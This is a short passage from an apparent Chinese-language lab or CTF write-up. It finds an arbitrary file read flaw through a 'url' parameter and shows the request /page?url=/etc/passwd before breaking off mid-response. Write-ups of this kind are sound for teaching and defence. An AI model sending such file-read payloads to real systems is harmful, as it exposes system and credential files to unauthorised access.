一、漏洞点发现进入靶场,发现存在一个表单,可以向page页面用GET请求方式发送一个名为url的参数,当你输入一个URL时会给你返回一个后缀为.jpg但内容为你的目标URL文件。<!doctype html> <html> <head> <title>test</title> </head> <body> <form action="/page" method="get"> <input type="text" name="url"/> </form> </body> </html>经过测试,url参数存在任意文件读取漏洞:访问/page?url=/etc/passwd:HTTP/1.1 200 OK Server: openresty Date: Wed, 12 Jun 2024 06:32:57 GMT Con
Equinox
一个乐于分享的网安人